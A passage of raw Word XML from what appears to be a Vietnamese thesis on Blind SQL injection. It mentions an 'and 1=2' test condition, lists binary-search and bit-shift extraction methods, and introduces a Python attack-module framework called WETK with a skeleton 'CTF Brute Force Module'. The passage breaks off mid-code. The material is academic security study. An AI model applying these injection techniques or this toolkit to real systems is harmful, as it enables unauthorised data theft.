            <wp:extent cx="3387519" cy="1853638"/>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3411563" cy="1866795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A67F5" w:rsidRPr="0007360D" w:rsidRDefault="0007360D" w:rsidP="0007360D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="143" w:name="_Toc458436441"/>
      <w:r w:rsidRPr="0007360D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Hìn</w:t>
      </w:r>
      <w:r w:rsidRPr="0007360D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">h </w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="0007360D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0007360D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="0007360D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="0007360D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0007360D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>: Không trả về kết quả khi điều kiện là False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> (and 1=2).</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>
    </w:p>
    <w:p w:rsidR="00DD5B0D" w:rsidRDefault="00DD5B0D" w:rsidP="00320504">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kết quả cho thấy ứng dụng web mắc lỗi SQL injection.</w:t>
      </w:r>
      <w:r w:rsidR="00653863">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tuy nhiên ứng dụng đã được cấu hình, cũng như sử dụng phương pháp chặn lọc từ khóa để phòng chống tấn công SQL injection nên không thể sử dụng các phương pháp dạng Error base hau Union Base.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00355955" w:rsidRDefault="00355955" w:rsidP="00355955">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Để thực hiện mô phỏng tấn công Blind SQL injection, luận văn cần xây dựng các đoạn mã tấn công cho các phương pháp. Đoạn mã sẽ triển khai các phương pháp tấn công sau đây:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00355955" w:rsidRPr="00355955" w:rsidRDefault="00355955" w:rsidP="00355955">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00355955">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tìm kiếm nhị phân</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00355955" w:rsidRPr="00355955" w:rsidRDefault="00355955" w:rsidP="00355955">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00355955">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phép dịch bit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00355955" w:rsidRPr="00355955" w:rsidRDefault="00355955" w:rsidP="00355955">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00355955">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phân tích thứ tự dữ liệu trả về</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00355955" w:rsidRDefault="00355955" w:rsidP="00320504">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Mã tấn công có thể được xây dựng bằng nhiều ngôn ngữ khác nhau. Trong đó, ngôn ngữ Python là ngôn ngữ phổ biến, thường được sử dụng. đây là một ngôn ngữ đơn giản, dễ học, đặc biệt được </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>cộng đồng hỗ trợ nhiều, cung cấp nhiều bộ thư viện dùng sẵn trong lập trình. Lập trình viên do đó sẽ tiết kiệm được nhiều thời gian trong quá trình phát triển mã tấn công.</w:t>
      </w:r>
      <w:r w:rsidR="002F2131">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00355955" w:rsidRDefault="00355955" w:rsidP="00320504">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Dựa trên các yêu cầu thực tế, trong quá trình hoàn thiện, luận văn đã thực hiện phát triển công cụ</w:t>
      </w:r>
      <w:r w:rsidR="003C6691">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00355955">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WETK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00355955">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(Web Exploit Toolkit)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Đây là một bộ công cụ được xây dựng bằng ngôn ngữ</w:t>
      </w:r>
      <w:r w:rsidR="002F2131">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python, cho phép quản lý các mã tấ</w:t>
      </w:r>
      <w:r w:rsidR="00586AE9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>n công. Các mã tấn công được xây dựng dưới dạng module, mỗi lần cần thêm mã tấn công chỉ việc tạo một file vào thư mục module của công cụ.</w:t>
      </w:r>
      <w:r w:rsidR="002906A4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bộ công cụ đóng vai trò như một Framework, cung cấp các chức năng quản lý module, các bộ hàm, thư viện cơ bản, bao gồm cả kiến trúc để tiếp nhận đầu vào từ người dùng, hiển thị kết quả.</w:t>
      </w:r>
      <w:r w:rsidR="00954BB3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Công cụ cung cấp sự tiện dụng cho lập trình viên, người phát triển mã tấn công, thay vì phải viết tất cả các thành phần: từ nhận đầu vào, hiển thị kết quả thì chỉ tập trung vào việc xây dựng mã khai thác. Ngoài ra, công cụ hỗ trợ quản lý các module, giúp dễ dàng trong việc tìm kiếm, sử dụng, cũng như tái sử dụng mã.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126AF3" w:rsidRDefault="00126AF3" w:rsidP="00126AF3">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D5B1F34" wp14:editId="6BC8E495">
            <wp:extent cx="3470300" cy="2956829"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="Picture 27" descr="WE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TK.bmp"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:srcRect l="7401" t="11785" r="34446" b="18162"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3470300" cy="2956829"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6691" w:rsidRPr="00126AF3" w:rsidRDefault="00126AF3" w:rsidP="00126AF3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="_Toc458436442"/>
      <w:r w:rsidRPr="00126AF3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="00126AF3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00126AF3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="00126AF3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="00126AF3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00126AF3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003C6691" w:rsidRPr="003C6691">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kiến trúc của WETK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144"/>
    </w:p>
    <w:p w:rsidR="00DD2BF4" w:rsidRDefault="00D33E86" w:rsidP="00D33E86">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14F6080A" wp14:editId="3D9F2E4A">
            <wp:extent cx="5225949" cy="2604211"/>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b="1657"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5225949" cy="2604211"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2BF4" w:rsidRPr="00DD2BF4" w:rsidRDefault="00DD2BF4" w:rsidP="00DD2BF4">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="_Toc458436443"/>
      <w:r w:rsidRPr="00DD2BF4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="00DD2BF4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00DD2BF4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="00DD2BF4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="00DD2BF4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00DD2BF4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>: Hướng dẫn sử dụng WETK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145"/>
    </w:p>
    <w:p w:rsidR="00586AE9" w:rsidRDefault="00586AE9" w:rsidP="00B1521D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đây là một một công cụ mã nguồn mở,</w:t>
      </w:r>
      <w:r w:rsidR="00E7608A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> đang trong quá trình phát triển.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E7608A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ã nguồn của công cụ được chia sẻ trên mạng Internet tại địa chỉ: </w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r w:rsidRPr="00394160">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>https://github.com/kendyhikaru/WETK/tree/master/WETK0.2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E7608A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để mọi người cùng phát triển.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2BF4" w:rsidRDefault="002E37B1" w:rsidP="00DD2BF4">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EBFB1BD" wp14:editId="3B1265DE">
            <wp:extent cx="5969889" cy="97292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972175" cy="973294"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2BF4" w:rsidRPr="00DD2BF4" w:rsidRDefault="00DD2BF4" w:rsidP="00DD2BF4">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="146" w:name="_Toc458436444"/>
      <w:r w:rsidRPr="00DD2BF4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="00DD2BF4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00DD2BF4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="00DD2BF4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="00DD2BF4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00DD2BF4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>: Hiển thị các module đã có của WETK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146"/>
    </w:p>
    <w:p w:rsidR="007B258A" w:rsidRDefault="000B0F4B" w:rsidP="00320504">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Luận văn sẽ sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00355955">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WETK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> làm framework xây dựng và quản lý mã tấn công. Do đó, việc xây dựng mã tấn công sẽ tuân thủ theo các yêu cầu, định</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> nghĩa của </w:t>
      </w:r>
      <w:r w:rsidRPr="00355955">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WETK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Trong đó, một module phải đảm bảo có 2 phần:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0F4B" w:rsidRPr="0060415D" w:rsidRDefault="000B0F4B" w:rsidP="0060415D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060415D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phần khởi tạo: định nghĩa các biến cần thiết, khai báo thư viện, các hàm dùng chung, cần sử dụng của WETK. Đây cũng là nơi định nghĩa các hướng dẫn cho module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0F4B" w:rsidRPr="0060415D" w:rsidRDefault="000B0F4B" w:rsidP="0060415D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060415D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phần chạy (runner): định nghĩa module sẽ làm gì. Khi gọi vào module, hàm này sẽ được gọi sau khi khởi tạo thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF7B8A" w:rsidRPr="0060415D" w:rsidRDefault="000B0F4B" w:rsidP="0060415D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060415D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phần tự định nghĩa của module</w:t>
      </w:r>
      <w:r w:rsidR="000A2289">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (tùy chọn)</w:t>
      </w:r>
      <w:r w:rsidRPr="0060415D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: các hàm, khái niệm do module tự định nghĩa.</w:t>
      </w:r>
      <w:r w:rsidR="0060415D" w:rsidRPr="0060415D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060415D" w:rsidRDefault="0060415D" w:rsidP="00CD0DD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Một module cơ bản gồm các thành phần như sau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidTr="000B0F4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9450" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t>from libs.coreHTTPModule import coreHTTPModule</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t>class module(coreHTTPModule):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">    def __init__(self, logger, profile):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        coreHTTPModule.__in</w:t>
            </w:r>
            <w:r w:rsidRPr="000B0F4B">
              <w:lastRenderedPageBreak/>
              <w:t>it__(self, logger, profile)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        self.name = "CTF Brute Force Module"  # Changed</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        self.description = "This is Module for Brute force, file fuzzing"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
              <w:t xml:space="preserve">        self.rank = "MEDIUM"  # Exploit level</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B0F4B" w:rsidRPr="000B0F4B" w:rsidRDefault="000B0F4B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="000B0F4B">
